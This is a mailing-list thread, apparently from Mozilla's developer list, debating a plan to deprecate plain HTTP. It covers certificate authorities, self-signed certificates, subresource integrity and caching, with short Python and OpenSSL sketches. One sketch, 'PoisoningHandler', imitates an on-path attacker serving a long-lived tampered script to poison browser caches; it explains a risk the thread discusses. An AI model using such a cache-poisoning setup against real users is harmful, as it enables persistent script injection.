There's pretty broad agreement that HTTPS is the way forward for the web. In recent months, there have been statements from IETF [1], IAB [2], W3C [3], and even the US Government [4] calling for universal use of encryption, which in the case of the web means HTTPS.

In order to encourage web developers to move from HTTP to HTTPS, I would like to propose establishing a deprecation plan for HTTP without security. Broadly speaking, this plan would entail limiting new features to secure contexts, followed by gradually removing legacy features from insecure contexts. Having an overall program for HTTP deprecation makes a clear statement to the web community that the time for plaintext is over -- it tells the world that the new web uses HTTPS, so if you want to use new things, you need to provide security.

Martin Thomson and I drafted a one-page outline of the plan with a few more considerations here:

https://docs.google.com/document/d/1IGYl_rxnqEvzmdAP9AJQYY2i2Uy_sW-cg9QI9ICe-ww/edit?usp=sharing

Some earlier threads on this list [5] and elsewhere [6] have discussed deprecating insecure HTTP for "powerful features". We think it would be a simpler and clearer statement to avoid the discussion of which features are "powerful" and focus on moving all features to HTTPS, powerful or not.

The goal of this thread is to determine whether there is support in the Mozilla community for a plan of this general form. Developing a precise plan will require coordination with the broader web community (other browsers, web sites, etc.), and will probably happen in the W3C.

Thanks,
--Richard

[1] https://tools.ietf.org/html/rfc7258
[2] https://www.iab.org/2014/11/14/iab-statement-on-internet-confidentiality/
[3] https://w3ctag.github.io/web-https/
[4] https://https.cio.gov/
[5] https://groups.google.com/d/topic/mozilla.dev.platform/vavZdN4tX44/discussion
[6] https://groups.google.com/a/chromium.org/d/topic/blink-dev/2LXKVWYkOus/discussion
I think that you'll need to define a number of levels of security, and decide how to distinguish them in the Firefox GUI:

- Unauthenticated/Unencrypted [http]
- Unauthenticated/Encrypted [https ignoring untrusted cert warning]
- DNS based auth/Encrypted [TLSA certificate hash in DNS]
- Ditto with TLSA/DNSSEC
- Trusted CA Authenticated [Any root CA]
- EV Trusted CA [Special policy certificates]

Ironically, your problem is more a GUI thing. All the security technology you need actually exists already...
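For concreteness, the TLSA item above is just an ordinary DNS query against a port- and protocol-prefixed name. A minimal sketch, assuming the third-party dnspython package (older releases spell the call `dns.resolver.query`) and using example.com as a placeholder for a DANE-enabled host:

```python
import dns.resolver  # third-party package: dnspython

# DANE publishes certificate associations at _<port>._<proto>.<host>;
# this asks for the TLSA record covering HTTPS (TCP port 443).
answers = dns.resolver.resolve("_443._tcp.example.com", "TLSA")

for rdata in answers:
    # Each record carries usage/selector/matching-type fields plus the
    # hash (or full value) of the certificate the server should present.
    print(rdata)
```

A DANE-aware client would compare the published hash against the certificate presented in the TLS handshake; as the reply below notes, Firefox performs no such lookup today.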
On Mon, Apr 13, 2015 at 10:40 AM, DDD <david.a.p.lloyd@gmail.com> wrote:
> I think that you'll need to define a number of levels of security, and
> decide how to distinguish them in the Firefox GUI:
>
> - Unauthenticated/Unencrypted [http]
> - Unauthenticated/Encrypted [https ignoring untrusted cert warning]
> - DNS based auth/Encrypted [TLSA certificate hash in DNS]
> - Ditto with TLSA/DNSSEC

Note that Firefox does not presently support either DANE or DNSSEC, so we don't need to distinguish these.

-Ekr

> - Trusted CA Authenticated [Any root CA]
> - EV Trusted CA [Special policy certificates]
>
> Ironically, your problem is more a GUI thing. All the security technology
> you need actually exists already...
> Note that Firefox does not presently support either DANE or DNSSEC,
> so we don't need to distinguish these.
>
> -Ekr

Nor does Chrome, and look what happened to both browsers...

http://www.zdnet.com/article/google-banishes-chinas-main-digital-certificate-authority-cnnic/

...the keys to the castle are in the DNS registration process. It is illogical not to add TLSA support.
> In order to encourage web developers to move from HTTP to HTTPS, I would
> like to propose establishing a deprecation plan for HTTP without security.

May I suggest defining "security" here as either:

1) A secure host (SSL), or
2) Protected by subresource integrity from a secure host

This would allow website operators to securely serve static assets from non-HTTPS servers without MITM risk, and without breaking transparent caching proxies.
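For reference, a subresource integrity value is just a base64-encoded digest of the resource's exact bytes, which either side can compute independently. A minimal sketch, assuming a local file app.js as a stand-in for the static asset:

```python
import base64
import hashlib

# Read the exact bytes that the server will send for this asset.
with open("app.js", "rb") as f:
    data = f.read()

# SRI commonly uses SHA-384; the attribute value is "<alg>-<base64 digest>".
digest = base64.b64encode(hashlib.sha384(data).digest()).decode("ascii")
print(f'integrity="sha384-{digest}"')
```

The embedding page, itself served over HTTPS, carries this value in the integrity attribute of its script or link tag, and the browser refuses to use any response whose bytes don't match.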
> 2) Protected by subresource integrity from a secure host
>
> This would allow website operators to securely serve static assets from non-HTTPS servers without MITM risk, and without breaking transparent caching proxies.

Is that a complicated word for SHA512 HASH? :) You could envisage a new http URL pattern:

http://video.vp9?<SHA512-HASH>
On 13.04.2015 20:52, david.a.p.lloyd@gmail.com wrote:
>> 2) Protected by subresource integrity from a secure host
>>
>> This would allow website operators to securely serve static assets from non-HTTPS servers without MITM risk, and without breaking transparent caching proxies.
>
> Is that a complicated word for SHA512 HASH? :) You could envisage a new http URL pattern http://video.vp9?<SHA512-HASH>

I suppose Subresource Integrity would be http://www.w3.org/TR/SRI/ -

But note that this will not give you extra security UI (or fewer warnings): browsers will still disable scripts served over HTTP on an HTTPS page - even if the integrity matches.

This is because HTTPS promises integrity, authenticity and confidentiality. SRI only provides the first.
On Mon, Apr 13, 2015 at 3:00 PM, Frederik Braun <fbraun@mozilla.com> wrote:
> I suppose Subresource Integrity would be http://www.w3.org/TR/SRI/ -
>
> But note that this will not give you extra security UI (or fewer
> warnings): browsers will still disable scripts served over HTTP on an
> HTTPS page - even if the integrity matches.
>
> This is because HTTPS promises integrity, authenticity and
> confidentiality. SRI only provides the first.

I agree that we should probably not allow insecure HTTP resources to be looped in through SRI. There are several issues with this idea, but the one that sticks out for me is the risk of leakage from HTTPS through these http-schemed resource loads. For example, the fact that you're loading certain images might reveal which Wikipedia page you're reading.

--Richard
On 13/04/15 15:57, Richard Barnes wrote:
> Martin Thomson and I drafted a
> one-page outline of the plan with a few more considerations here:
>
> https://docs.google.com/document/d/1IGYl_rxnqEvzmdAP9AJQYY2i2Uy_sW-cg9QI9ICe-ww/edit?usp=sharing

Are you sure "privileged contexts" is the right phrase? Surely contexts are "secure", and APIs or content is "privileged" by being only available in a secure context?

There's nothing wrong with your plan, but that's partly because it's hard to disagree with your principle, and the plan is pretty high level. I think the big arguments will be over when and what features require a secure context, and how much breakage we are willing to tolerate.

I know the Chrome team have a similar plan; is there any suggestion that we might coordinate on feature re-privilegings?

Would we put an error on the console when a privileged API was used in an insecure context?

Gerv
On 13/04/15 18:40, DDD wrote:
> I think that you'll need to define a number of levels of security, and decide how to distinguish them in the Firefox GUI:
>
> - Unauthenticated/Unencrypted [http]
> - Unauthenticated/Encrypted [https ignoring untrusted cert warning]
> - DNS based auth/Encrypted [TLSA certificate hash in DNS]
> - Ditto with TLSA/DNSSEC
> - Trusted CA Authenticated [Any root CA]
> - EV Trusted CA [Special policy certificates]

I'm not quite sure what this has to do with the proposal you are commenting on, but I would politely ask you how many users you think are both interested in, able to understand, and willing to take decisions based on _six_ different security states in a browser?

The entire point of this proposal is to reduce the web to one security state - "secure".

Gerv
On Mon, Apr 13, 2015 at 12:11 PM, Gervase Markham <gerv@mozilla.org> wrote:
> Are you sure "privileged contexts" is the right phrase? Surely contexts
> are "secure", and APIs or content is "privileged" by being only
> available in a secure context?

There was a long-winded group bike-shed-painting session on the public-webappsec list and this is the term they ended up with. I don't believe that it is the right term either, FWIW.

> There's nothing wrong with your plan, but that's partly because it's
> hard to disagree with your principle, and the plan is pretty high level.
> I think the big arguments will be over when and what features require a
> secure context, and how much breakage we are willing to tolerate.

Not much, but maybe more than we used to.

> I know the Chrome team have a similar plan; is there any suggestion that
> we might coordinate on feature re-privilegings?

Yes, the intent is definitely to collaborate, as the original email stated. Chrome isn't the only stakeholder, which is why we suggested that we go to the W3C so that the browser formerly known as IE and Safari are included.

> Would we put an error on the console when a privileged API was used in
> an insecure context?

Absolutely. That's likely to be a first step once the targets have been identified. That pattern has already been established for bad crypto and a bunch of other things that we don't like but are forced to tolerate for compatibility reasons.
> I would politely ask you how many users you think are
> both interested in, able to understand, and willing to take decisions
> based on _six_ different security states in a browser?

I think this thread is about deprecating things and moving developers onto more secure platforms. To do that, you'll need to tell me *why* I need to make the effort. The only thing that I am going to care about is to get users closer to that magic green bar and padlock icon.

You may hope that security is black and white, but in practice it isn't. There is always going to be a sliding scale. Do you show me a green bar and padlock if I go to www.google.com, but the certificate is issued by my intranet? Do you show me the same certificate error I'd get as if I was connecting to a clearly malicious certificate?

What if I go to www.google.com, but the certificate has been issued incorrectly because Firefox ships with 500 equally trusted root certificates?

So - yeah, you're going to need a rating system for your security: A, B, C, D, Fail. You're going to have to explain what situations get you into what group, and how as a developer I can move to a higher group (e.g. add a certificate hash into DNS, get an EV certificate costing $10,000, implement DNSSEC, use PFS ciphersuites and you get an A rating). I'm sure that there'll be new security vulnerabilities and best practice in future, too.

Then it is up to me as a developer to decide how much effort I can realistically put into this...

...for my web-site containing pictures of cats...
Great, peachy, more authoritarian dictation of end-user behavior by the Elite is just what the Internet needs right now. And hey, screw anybody trying to use legacy systems for anything, right? Right!
HTTP should remain optional and fully-functional, for the purposes of prototyping and diagnostics. I shouldn't need to set up a TLS layer to access a development server running on my local machine, or to debug which point before hitting the TLS layer is corrupting requests.
On Monday, April 13, 2015 at 3:36:56 PM UTC-4, commod...@gmail.com wrote:
> Great, peachy, more authoritarian dictation of end-user behavior by the Elite is just what the Internet needs right now. And hey, screw anybody trying to use legacy systems for anything, right? Right!

Let 'em do this. When Mozilla and Google drop HTTP support, then it'll be open season for someone to fork/make a new browser with HTTP support, and gain an instant 30% market share. These guys have run amok with major decisions (like the HTTP/2 TLS mandate) because of a lack of competition.

These guys can go around thinking they're secure while trusting root CAs like CNNIC whilst ignoring DNSSEC and the like; the rest of us can get back on track with a new, sane browser. While we're at it, we could start treating self-signed certs like we do SSH, rather than as being *infinitely worse* than HTTP (I'm surprised Mozilla doesn't demand a faxed form signed by a notary public to accept a self-signed cert yet. But I shouldn't give them any ideas...)
I have given this a lot of thought lately, and to me the only way forward is to do exactly what is suggested here: phase out and eventually drop plain HTTP support. There are numerous reasons for doing this:

- Plain HTTP allows someone to snoop on your users.
- Plain HTTP allows someone to misrepresent your content to the users.
- Plain HTTP is a great vector for phishing, as well as injecting malicious code that comes from your domain.
- Plain HTTP provides no guarantees of identity to the user. Arguably, the current HTTPS implementation doesn't do much to fix this, but more on this below.
- Lastly, arguing that HTTP is cheaper than HTTPS is going to be much harder once there are more providers giving away free certs (looking at StartSSL and Let's Encrypt).

My vision would be that HTTP should be marked with the same warning (except for wording of course) as an HTTPS site secured by a self-signed cert. In terms of security, they are more or less equivalent, so there is no reason to treat them differently. This should be the goal.

There are problems with transitioning to giving a huge scary warning for HTTP. They include:

- A large number of sites that don't support HTTPS. To fix this, I think the best method is to show the "http://" part of the URL in red, and publicly announce that over the next X months Firefox is moving to the model of giving a big scary warning a la self-signed cert warning if HTTPS is not enabled.
- A large number of corporate intranets that run plain HTTP. Perhaps a build-time configuration could be enabled that would enable system administrators to ignore the warning for certain subdomains or the RFC 1918 addresses as well as localhost. Note that carrier-grade NAT in IPv4 might make the latter a bad choice by default.
- Ad-supported sites report a drop in ad revenue when switching to HTTPS. I don't know what the problem or solution here is, but I am certain this is a big hurdle for some sites.
- Lack of free wildcard certificates. Ideally, Let's Encrypt should provide these.
- Legacy devices that cannot be upgraded to support HTTPS or only come with self-signed certificates. This is a problem that can be addressed by letting the user bypass the scary warning (just like with self-signed certs).

Finally, some people conflate the idea of a global transition from plain HTTP to HTTPS as a move by CAs to make more money. They might argue that first, we need to get rid of CAs or provide an alternative path for obtaining certificates. I disagree. Switching from plain HTTP to HTTPS is step one. Step two might include adding more avenues for establishing trust and authentication. There is no reason to try to add additional methods of authenticating the servers while still allowing them to use no encryption at all. Let's kill off plain HTTP first, then worry about how to fix the CA system. Let's Encrypt will of course make this a lot easier by providing free certs.
On Monday, April 13, 2015 at 4:43:25 PM UTC-4, byu...@gmail.com wrote:
> These guys can go around thinking they're secure while trusting root CAs like CNNIC whilst ignoring DNSSEC and the like; the rest of us can get back on track with a new, sane browser. While we're at it, we could start treating self-signed certs like we do SSH, rather than as being *infinitely worse* than HTTP (I'm surprised Mozilla doesn't demand a faxed form signed by a notary public to accept a self-signed cert yet. But I shouldn't give them any ideas ...)

A self-signed cert is worse than HTTP, in that you cannot know if the site you are accessing is supposed to have a self-signed cert or not. If you know that, you can check the fingerprint and bypass the warning. But let's say you go to download a fresh copy of Firefox, just to find out that https://www.mozilla.org/ is serving a self-signed cert. How can you possibly be sure that you are not being MITM'ed? Arguably, it's worse if we simply ignore the fact that the cert is self-signed, and simply let you download the compromised version, vs giving you some type of indication that the connection is not secure (e.g.: no green bar because it's plain HTTP).

That is not to say that we should continue as is. HTTP is insecure, and should give the same warning as HTTPS with a self-signed cert.
On 4/13/2015 3:29 PM, stuart@testtrack4.com wrote:
> HTTP should remain optional and fully-functional, for the purposes of prototyping and diagnostics. I shouldn't need to set up a TLS layer to access a development server running on my local machine, or to debug which point before hitting the TLS layer is corrupting requests.

If you actually go to read the details of the proposal rather than relying only on the headline, you'd find that there is an intent to actually let you continue to use http for, e.g., localhost. The exact boundary between "secure" HTTP and "insecure" HTTP is being actively discussed in other forums.

--
Joshua Cranmer
Thunderbird and DXR developer
Source code archæologist
One limiting factor is that Firefox doesn't treat form data the same on HTTPS sites. Examples:

http://stackoverflow.com/questions/14420624/how-to-keep-changed-form-content-when-leaving-and-going-back-to-https-page-wor

http://stackoverflow.com/questions/10511581/why-are-html-forms-sometimes-cleared-when-clicking-on-the-browser-back-button

After losing a few forum posts or wiki edits to this bug in Firefox, you quickly insist on using unsecured HTTP as often as possible.
On 4/13/15 5:11 PM, bryan.beicker@gmail.com wrote:
> After losing a few forum posts or wiki edits to this bug in Firefox, you
> quickly insist on using unsecured HTTP as often as possible.

This is only done in cases in which the page explicitly requires that nothing about the page be cached (no-cache), yes?

That said, we should see if we can stop doing the state-not-saving thing for SSL+no-cache and tell banks who want it to use no-store.

-Boris
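To illustrate the distinction being drawn here: no-cache allows a response to be stored but requires revalidation before reuse, while no-store forbids keeping it at all. A minimal sketch of a server opting for the stricter directive, using Python's standard http.server purely as a stand-in (the port and form content are illustrative):

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class FormHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        # no-store: nothing about this response may be persisted anywhere.
        # Contrast with no-cache, which allows storage but requires
        # revalidation with the server before a cached copy is reused.
        self.send_header("Cache-Control", "no-store")
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        self.wfile.write(b"<form><input name='comment'></form>")

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8000), FormHandler).serve_forever()
```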
Late to the thread, but I'll use this reply to say we're very supportive of the proposal at CDT.

On Mon, Apr 13, 2015 at 4:48 PM, <ipartola@gmail.com> wrote:
> I have given this a lot of thought lately, and to me the only way forward
> is to do exactly what is suggested here: phase out and eventually drop
> plain HTTP support. [...]

--
Joseph Lorenzo Hall
Chief Technologist
Center for Democracy & Technology
1634 I ST NW STE 1100
Washington DC 20006-4011
(p) 202-407-8825
(f) 202-637-0968
joe@cdt.org
PGP: https://josephhall.org/gpg-key
fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
I fully support this proposal.

In addition to APIs, I'd like to propose prohibiting caching any resources loaded over insecure HTTP, regardless of Cache-Control header, in Phase 2.N. The reasons are:

1) A MITM can pollute users' HTTP cache by modifying some JavaScript files with a long cache-control max-age (see the sketch below).
2) It won't break any websites, just some performance penalty for them.
3) Many website operators and users avoid using HTTPS, since they believe HTTPS is much slower than plaintext HTTP. After deprecating HTTP cache, this argument will be more wrong.
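To make the attack in reason 1 concrete: an on-path attacker rewrites a single plaintext response so it carries a far-future lifetime, and the victim's browser keeps re-executing the tampered script from cache long after leaving the hostile network. A minimal sketch of what the substituted response could look like, with the one-year max-age, port, and script body as illustrative choices:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class PoisoningHandler(BaseHTTPRequestHandler):
    """Stand-in for an on-path attacker rewriting a plaintext response."""

    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-Type", "application/javascript")
        # A far-future lifetime keeps the tampered script in the victim's
        # cache; later page loads re-run it without any network request.
        self.send_header("Cache-Control", "public, max-age=31536000")
        self.end_headers()
        self.wfile.write(b"/* attacker-controlled script */")

if __name__ == "__main__":
    HTTPServer(("127.0.0.1", 8080), PoisoningHandler).serve_forever()
```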
On Mon, Apr 13, 2015 at 3:53 PM, Eugene <imfasterthanneutrino@gmail.com> wrote:
> In addition to APIs, I'd like to propose prohibiting caching any
> resources loaded over insecure HTTP, regardless of Cache-Control header,
> in Phase 2.N.

This has some negative consequences (if only for performance). I'd like to see changes like this properly coordinated. I'd rather just treat "caching" as one of the features for Phase 2.N.
On Monday, April 13, 2015 at 7:57:58 AM UTC-7, Richard Barnes wrote:
> In order to encourage web developers to move from HTTP to HTTPS, I would
> like to propose establishing a deprecation plan for HTTP without security.
> Broadly speaking, this plan would entail limiting new features to secure
> contexts, followed by gradually removing legacy features from insecure
> contexts. Having an overall program for HTTP deprecation makes a clear
> statement to the web community that the time for plaintext is over -- it
> tells the world that the new web uses HTTPS, so if you want to use new
> things, you need to provide security.

I'd be fully supportive of this if - and only if - at least one of the following is implemented alongside it:

* Less scary warnings about self-signed certificates (i.e. treat HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less secure than HTTP is - to put this as politely and gently as possible - a pile of bovine manure

* Support for a decentralized (blockchain-based, ala Namecoin?) certificate authority

Basically, the current CA system is - again, to put this as gently and politely as possible - fucking broken. Anything that forces the world to rely on it exclusively is not a solution, but is instead just going to make the problem worse.
On Monday, April 13, 2015 at 8:57:41 PM UTC-4, northrupt...@gmail.com wrote:
> * Less scary warnings about self-signed certificates (i.e. treat HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less secure than HTTP is - to put this as politely and gently as possible - a pile of bovine manure

This feature (i.e. opportunistic encryption) was implemented in Firefox 37, but unfortunately an implementation bug made HTTPS insecure too. But I guess Mozilla will fix it and make this feature available in a future release.

> * Support for a decentralized (blockchain-based, ala Namecoin?) certificate authority
>
> Basically, the current CA system is - again, to put this as gently and politely as possible - fucking broken. Anything that forces the world to rely on it exclusively is not a solution, but is instead just going to make the problem worse.

I don't think the current CA system is broken. The domain name registration is also centralized, but almost every website has a hostname, rather than using IP address, and few people complain about this.
On 14 Apr 2015, at 10:43, imfasterthanneutrino@gmail.com wrote:
> I don't think the current CA system is broken.

The current CA system creates issues for certain categories of population. It is broken in some ways.

> The domain name registration is also centralized, but almost every
> website has a hostname, rather than using IP address, and few people
> complain about this.

Two points:

1. You do not need to register a domain name to have a Web site (IP address)
2. You do not need to register a domain name to run a local blah.test.site

Both are still working and not deprecated in browsers ^_^

Now the fact that you have to rent your domain name ($$$), and that all the URIs are tied to this, has strong social consequences in terms of permanent identifiers and the fabric of time on information. But that's another debate than the one of this thread on deprecating HTTP in favor of HTTPS. I would love to see this discussion happening in Whistler too.

--
Karl Dubost, Mozilla
http://www.la-grange.net/karl/moz
> * Less scary warnings about self-signed certificates (i.e. treat HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less secure than HTTP is - to put this as politely and gently as possible - a pile of bovine manure

I am against this. Both are insecure and should be treated as such. How is your browser supposed to know that gmail.com is intended to serve a self-signed cert? It's not, and it cannot possibly know it in the general case. Thus it must be treated as insecure.

> * Support for a decentralized (blockchain-based, ala Namecoin?) certificate authority

No. Namecoin has so many other problems that it is not feasible.

> Basically, the current CA system is - again, to put this as gently and politely as possible - fucking broken. Anything that forces the world to rely on it exclusively is not a solution, but is instead just going to make the problem worse.

Agree that it's broken. The fact that any CA can issue a cert for any domain is stupid, always was and always will be. It's now starting to bite us.

However, HTTPS and the CA system don't have to be tied together. Let's ditch the immediately insecure plain HTTP, then add ways to authenticate trusted certs in HTTPS by means other than our current CA system. The two problems are orthogonal, and trying to solve both at once will just leave us exactly where we are: trying to argue for a fundamentally different system.
On Monday, April 13, 2015 at 10:10:44 PM UTC-4, Karl Dubost wrote:
> Now the fact that you have to rent your domain name ($$$), and that all
> the URIs are tied to this, has strong social consequences in terms of
> permanent identifiers and the fabric of time on information. But that's
> another debate than the one of this thread on deprecating HTTP in favor
> of HTTPS.

The registrars are, as far as I'm concerned, where the solution to the CA problem lies. You buy a domain name from someone, you are already trusting them with it. They can simply redirect your nameservers elsewhere and you can't do anything about it. Remember, you never buy a domain name, you lease it.

What does this have to do with the plain HTTP to HTTPS transition? Well, why are we trusting CAs at all? Why not have the registrar issue you a wildcard cert with the purchase of a domain, and add restrictions to the protocol such that only your registrar can issue a cert for that domain?

Or even better, have the registrar sign a CA cert for you that is good for your domain only. That way you can issue unlimited certs for domains you own and *nobody but you can do that*.

However, like you said, that's a separate discussion. We can solve the CA problem after we solve the plain HTTP problem.
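X.509 already has a mechanism that fits this registrar idea: the name constraints extension, which confines a CA certificate to a given DNS subtree. A hedged sketch of how a registrar might sign such a constrained customer CA with the OpenSSL command line (all file names and the domain are illustrative):

```
# customer-ca.ext -- v3 extensions for the customer's constrained CA
basicConstraints = critical, CA:TRUE
keyUsage         = critical, keyCertSign, cRLSign
# This CA may only issue certificates for example.com and its subdomains.
nameConstraints  = critical, permitted;DNS:example.com

# The registrar signs the customer's CSR with those constraints applied:
#   openssl x509 -req -in customer-ca.csr \
#     -CA registrar-root.pem -CAkey registrar-root.key -CAcreateserial \
#     -extfile customer-ca.ext -days 365 -out customer-ca.pem
```

In practice, enforcement of name constraints has historically been uneven across clients, which is part of why this is not a deployed alternative to the CA system today.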
On Monday, April 13, 2015 at 1:43:25 PM UTC-7, byu...@gmail.com wrote:
> Let 'em do this. When Mozilla and Google drop HTTP support, then it'll be open season for someone to fork/make a new browser with HTTP support, and gain an instant 30% market share.

Or, more likely, it'll be a chance for Microsoft and Apple to laugh all the way to the bank. Because seriously, what else would you expect to happen when the makers of a web browser announce that, starting in X months, they'll be phasing out compatibility with the vast majority of existing websites?
On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote:
> HTTP deprecation

I'm strongly against the proposal as it is described here. I work with small embedded devices (think sensor network) that are accessed over HTTP. These devices have very little memory, only a few kB; implementing SSL is simply not possible. Who are you to decree these devices become unfit hosts?

Secondly, the proposal to restrain unrelated new features like CSS attributes to HTTPS sites only is simply a form of strong-arming. Favoring HTTPS is fine but authoritarianism is not. Please consider that everyone is capable of making their own decisions.

Lastly, deprecating HTTP in the current state of the certificate authority business is completely unacceptable. These are *not* separate issues; to implement HTTPS without warnings you must be able to obtain certificates (including wildcard ones) easily and affordably, and not only for rich western country citizens. The "let's go ahead and we'll figure this out later" attitude is irresponsible considering the huge impact that this change will have.

I would view this proposal favorably if 1) you didn't try to force people to adopt the One True Way and 2) the CA situation was fixed.
On Tuesday, April 14, 2015 at 12:27:22 AM UTC-4, commod...@gmail.com wrote:
> Or, more likely, it'll be a chance for Microsoft and Apple to laugh all
> the way to the bank. Because seriously, what else would you expect to
> happen when the makers of a web browser announce that, starting in X
> months, they'll be phasing out compatibility with the vast majority of
> existing websites?

This isn't at all what Richard was trying to say. The original discussion states that the plan will be to make all new browser features only work under HTTPS, to help developers and website owners to migrate to HTTPS only. This doesn't mean these browsers will ever remove support for HTTP; the plan is simply to deprecate it. Browsers still support many legacy and deprecated features.
On Tuesday, April 14, 2015 at 1:16:25 AM UTC-4, vic wrote:
> I'm strongly against the proposal as it is described here. I work with
> small embedded devices (think sensor network) that are accessed over
> HTTP. These devices have very little memory, only a few kB; implementing
> SSL is simply not possible. Who are you to decree these devices become
> unfit hosts? [...]

An embedded device would not be using a web browser such as Firefox, so this isn't really much of a concern. The idea would be to only enforce HTTPS deprecation from browsers, not web servers. You can continue to use HTTP on your own web services and therefore use it through your embedded devices.

As all technology protocols change over time, enforcing encryption is a natural and logical step to evolve web technology. Additionally, while everyone is able to make their own decisions, it doesn't mean people make the right choice. A website that uses sensitive data insecurely over HTTP, where the users are unaware (as most web consumers are not even aware what the difference between HTTP and HTTPS means), is not worth the risk. It'd be better to enforce security and reduce the risks that exist with internet privacy. Mozilla never truly tries to operate anything with an authoritarian approach; this suggestion is to protect the consumers of the web, not the developers of the web.

Mozilla is trying to get https://letsencrypt.org/ started, which will be free, removing all price arguments from this discussion.

IMHO, this debate should be focused on improving the way HTTP is deprecated, but I do not believe there are any valid concerns that HTTP should not be deprecated.
IMO, limiting new features to HTTPS only, when there's no real security reason behind it, will only end up limiting feature adoption. It directly punishes developers and adds friction to using new features, but only influences business in a very indirect manner.

If we want to move more people to HTTPS, we can do any or all of the following:

* Show user warnings when the site they're on is insecure
* Provide an opt-in "don't display HTTP" mode as an integral part of the browser. Make it extremely easy to opt in.

Search engines can also:

* Downgrade ranking of insecure sites in a significant way
* Provide a "don't show me insecure results" button

If you're limiting features to HTTPS with no reason, you're implicitly saying that developer laziness is what's stalling adoption. I don't believe that's the case. There's a real eco-system problem with 3rd party widgets and ad networks that makes it hard for large sites to switch until all of their site's widgets have. Developers have no say here. Business does.

What you want is to make the business folks threaten that out-dated 3rd party widget that if it doesn't move to HTTPS, the site would switch to the competition. For that you need to use a stick that business folks understand: "If you're on HTTP, you'd see less and less traffic". Limiting new features does absolutely nothing in that aspect.
On Tue, Apr 14, 2015 at 7:52 AM, Yoav Weiss <yoav@yoav.ws> wrote:
> Limiting new features does absolutely nothing in that aspect.

Hyperbole much? The CTO of the New York Times cited HTTP/2 and Service Workers as a reason to start deploying HTTPS:

http://open.blogs.nytimes.com/2014/11/13/embracing-https/

(And anecdotally, I find it easier to convince developers to deploy HTTPS on the basis of some feature needing it than on merit. And it makes sense, if they need their service to do X, they'll go through the extra trouble to do Y to get to X.)

--
https://annevankesteren.nl/
On Tue, Apr 14, 2015 at 4:10 AM, Karl Dubost <kdubost@mozilla.com> wrote:
> 1. You do not need to register a domain name to have a Web site (IP address)

Name one site you visit regularly that doesn't have a domain name. And even then, you can get certificates for public IP addresses.

> 2. You do not need to register a domain name to run a local blah.test.site

We should definitely allow whitelisting of sorts for developers. As a start, localhost will be a privileged context by default. We also have an override in place for Service Workers. This is not a reason not to do HTTPS. This is something we need to improve along the way.

--
https://annevankesteren.nl/
> Secondly the proposal to restrain unrelated new features like CSS attributes to HTTPS sites only is simply a form of strong-arming. Favoring HTTPS is fine but authoritarianism is not. Please consider that everyone is capable of making their own decisions.

One might note that this has already been tried, *and succeeded*, with SPDY and then HTTP/2.

HTTP/2 is faster than HTTP/1, but both Mozilla and Google are refusing to allow unencrypted HTTP/2 connections. Sites like http://httpvshttps.com/ intentionally mislead users into thinking that TLS improves connection speed, when actually the increased speed is from HTTP/2.
> The goal of this thread is to determine whether there is support in the
> Mozilla community for a plan of this general form. Developing a precise
> plan will require coordination with the broader web community (other
> browsers, web sites, etc.), and will probably happen in the W3C.

From the user/sysadmin point of view it would be very helpful to have information on how the following issues will be handled:

1) Caching proxies: resources obtained over HTTPS cannot be cached by a proxy that doesn't use MITM certificates. If all users must move to HTTPS there will be no way to re-use content downloaded for one user to accelerate another user. This is an important issue for locations with many users and poor internet connectivity.

2) Self-signed certificates: in many situations it is hard/impossible to get certificates signed by a CA (e.g. provisioning embedded devices). The current approach in many of these situations is not to use HTTPS. If the plan goes into effect, what other solution could be used?

Regarding problem 1: I guess that allowing HTTP for resources loaded with subresource integrity could be some sort of alternative, but it would require collaboration from the server owner. Being more work than simply letting the webserver send out caching headers automatically, I wonder how many sites will implement it.

Regarding problem 2: in my opinion it can be mitigated by offering the user a new standard way to validate self-signed certificates: the user is prompted to enter the fingerprint of the certificate that she must have received out-of-band, and if the user enters the correct fingerprint the certificate is marked as trusted (see [1]). This clearly opens up some attacks that should be carefully assessed.

Best,
Lorenzo

[1] https://bugzilla.mozilla.org/show_bug.cgi?id=1012879
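To make the out-of-band fingerprint check in problem 2 concrete: a fingerprint is just a digest of the certificate's DER encoding, so both sides can compute it independently. A minimal sketch using Python's standard library, with example.com standing in for the device (assumes the host is reachable on port 443):

```python
import hashlib
import ssl

# Fetch the certificate the server presents (no validation is performed
# with the default arguments; we only want the bytes to fingerprint them).
pem = ssl.get_server_certificate(("example.com", 443))
der = ssl.PEM_cert_to_DER_cert(pem)

# The SHA-256 of the DER encoding is the fingerprint the user would
# compare against the value received out-of-band.
fingerprint = hashlib.sha256(der).hexdigest()
print(":".join(fingerprint[i:i + 2] for i in range(0, len(fingerprint), 2)))
```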
Another note:

Nobody, to within experimental error, uses IP addresses to access public websites.

But plenty of people use them for test servers, temporary servers, and embedded devices. (My home router is http://192.168.1.254/ - do they need to get a certificate for 192.168.1.254? Or do home routers need to come with installation CDs that install the router's root certificate? How is that not a worse situation, where every web user has to trust the router manufacturer?)

And even though nobody uses IP addresses, and many public websites don't work with IP addresses (because vhosts), nobody in their right mind would ever suggest removing the possibility of accessing web servers without domain names.
On Tue, Apr 14, 2015 at 8:22 AM, Anne van Kesteren <annevk@annevk.nl> wrote:
> Hyperbole much? The CTO of the New York Times cited HTTP/2 and Service
> Workers as a reason to start deploying HTTPS:
>
> http://open.blogs.nytimes.com/2014/11/13/embracing-https/

I stand corrected. So it's the 8th reason out of 9, right before technical debt.

I'm not saying using new features is not an incentive, and I'm definitely not saying HTTP/2 and SW should have been enabled on HTTP. But, when done without any real security or deployment issues that mandate it, you're subjecting new features to significant adoption friction that is unrelated to the feature itself, in order to apply some indirect pressure on businesses to do the right thing. You're inflicting developer pain without any real justification. A sort of collective punishment, if you will.

If you want to apply pressure, apply it where it makes the most impact with the least cost. Limiting new features to HTTPS is not the place, IMO.

